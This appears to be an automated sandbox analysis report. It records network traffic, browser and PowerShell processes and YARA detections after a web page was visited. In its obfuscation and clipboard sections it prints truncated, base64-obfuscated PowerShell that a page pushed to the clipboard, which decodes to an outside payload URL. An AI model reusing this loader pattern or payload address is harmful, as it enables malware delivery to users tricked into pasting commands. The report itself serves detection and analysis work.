          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49677
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49791 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49792 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.50.80.209:443 -> 192.168.2.17:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.17:49802 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49804 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.240.156.206:443 -> 192.168.2.17:49808 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49810 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.211.137.143:443 -> 192.168.2.17:49843 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi64_5464.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_5464.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal84.phis.troj.evad.win@79/428@132/68
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShellJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_2023482335
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_si2as3d3.ljf.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,3997205691396304425,4085780284626710744,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:3
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/our-story"
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5016 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,3997205691396304425,4085780284626710744,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5016 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==')$e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==')$e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW')$e

          Persistence and Installation Behavior

          barindex
          HTML page adds supicious text to clipboard
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
